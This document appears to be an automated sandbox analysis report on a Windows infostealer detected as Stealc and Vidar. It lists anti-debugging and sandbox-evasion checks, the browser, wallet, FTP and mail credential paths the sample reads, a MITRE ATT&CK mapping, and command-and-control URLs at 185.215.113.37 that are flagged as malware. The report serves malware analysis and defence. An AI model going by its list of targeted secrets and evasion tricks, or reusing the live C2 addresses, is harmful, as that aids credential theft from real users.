Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00774910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00774910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0076DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0076DA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0076E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0076E430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0076BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0076BE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007616D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_007616D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0076F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0076F6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00773EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00773EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007738B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_007738B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00774570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00774570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0076ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0076ED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0076DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0076DE10

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00761160 GetSystemInfo,ExitProcess,

0_2_00761160

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Source: file.exe, file.exe, 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: EGDGIEGH.0.dr	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: EGDGIEGH.0.dr	Binary or memory string: discord.comVMware20,11696494690f
Source: EGDGIEGH.0.dr	Binary or memory string: AMC password management pageVMware20,11696494690
Source: EGDGIEGH.0.dr	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: EGDGIEGH.0.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: EGDGIEGH.0.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: EGDGIEGH.0.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: EGDGIEGH.0.dr	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: EGDGIEGH.0.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: EGDGIEGH.0.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: EGDGIEGH.0.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: EGDGIEGH.0.dr	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: file.exe, 00000000.00000002.1638110314.0000000001284000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1638110314.00000000012C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: EGDGIEGH.0.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: EGDGIEGH.0.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: EGDGIEGH.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: EGDGIEGH.0.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: EGDGIEGH.0.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: EGDGIEGH.0.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: EGDGIEGH.0.dr	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: EGDGIEGH.0.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: EGDGIEGH.0.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: EGDGIEGH.0.dr	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: EGDGIEGH.0.dr	Binary or memory string: global block list test formVMware20,11696494690
Source: file.exe, 00000000.00000002.1638110314.000000000123E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: EGDGIEGH.0.dr	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: EGDGIEGH.0.dr	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: EGDGIEGH.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: EGDGIEGH.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: EGDGIEGH.0.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: file.exe, 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: EGDGIEGH.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: EGDGIEGH.0.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: EGDGIEGH.0.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-59359
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58169
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58172
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58191
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58183
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58223

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CBF5FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose,

0_2_6CBF5FF0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_007645C0 VirtualProtect ?,00000004,00000100,00000000

0_2_007645C0

Source: C:\Users\user\Desktop\file.exe

0_2_00779860

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00779750 mov eax, dword ptr fs:[00000030h]

0_2_00779750

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00777850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00777850

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBCB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_6CBCB66C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBCB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_6CBCB1F7

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 7476, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00779600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00779600

Source: file.exe, file.exe, 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: :Program Manager

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CBCB341 cpuid

0_2_6CBCB341

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00777B90

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00776920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,

0_2_00776920

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00777850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00777850

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00777A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_00777A30

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.760000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1638110314.000000000123E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1411403203.0000000005100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7476, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 7476, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe	String found in binary or memory: \Electrum-LTC\wallets\
Source: file.exe	String found in binary or memory: \ElectronCash\wallets\
Source: file.exe	String found in binary or memory: \Electrum\wallets\
Source: file.exe	String found in binary or memory: window-state.json
Source: file.exe	String found in binary or memory: Jaxx Desktop
Source: file.exe	String found in binary or memory: exodus.conf.json
Source: file.exe	String found in binary or memory: \Exodus\
Source: file.exe	String found in binary or memory: info.seco
Source: file.exe	String found in binary or memory: ElectrumLTC
Source: file.exe	String found in binary or memory: passphrase.json
Source: file.exe	String found in binary or memory: \jaxx\Local Storage\
Source: file.exe	String found in binary or memory: \Ethereum\
Source: file.exe	String found in binary or memory: exodus.conf.json
Source: file.exe, 00000000.00000002.1661273671.0000000029932000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\app-store.json
Source: file.exe	String found in binary or memory: \Ethereum\
Source: file.exe	String found in binary or memory: file__0.localstorage
Source: file.exe	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: file.exe	String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe	String found in binary or memory: multidoge.wallet
Source: file.exe	String found in binary or memory: seed.seco
Source: file.exe	String found in binary or memory: keystore
Source: file.exe	String found in binary or memory: \Electrum-LTC\wallets\
Source: file.exe, 00000000.00000002.1638110314.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\.l

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: Yara match

File source: Process Memory Space: file.exe PID: 7476, type: MEMORYSTR

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.760000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1638110314.000000000123E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1411403203.0000000005100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7476, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 7476, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	4 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	345 System Information Discovery	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	651 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	33 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	33 Virtualization/Sandbox Evasion	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\vcruntime140[1].dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://www.sqlite.org/copyright.html.	0%	URL Reputation	safe
https://mozilla.org0/	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0%	URL Reputation	safe
https://support.mozilla.org	0%	URL Reputation	safe
http://185.215.113.37/0d60be0de163924d/nss3.dlly	100%	Avira URL Cloud	malware
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
http://185.215.113.37/e	100%	Avira URL Cloud	malware
http://185.215.113.37/	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpdowsApps	100%	Avira URL Cloud	malware
http://185.215.113.37/b	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/nss3.dll	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.php.dllA	100%	Avira URL Cloud	malware
http://185.215.113.37	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/mozglue.dll	100%	Avira URL Cloud	malware
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi	0%	Avira URL Cloud	safe
http://185.215.113.37/e2b1563c6670f193.phpimple-storage.json	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.php.dll	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/softokn3.dll0	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/softokn3.dll	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpw	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/freebl3.dll	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phption:	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpa	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpGDHJDHDAFHJJKJEHC	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.php	100%	Avira URL Cloud	malware
http://185.215.113.37d	0%	Avira URL Cloud	safe
http://185.215.113.37/e2b1563c6670f193.phpll	100%	Avira URL Cloud	malware
http://www.mozilla.com/en-US/blocklist/	0%	Avira URL Cloud	safe
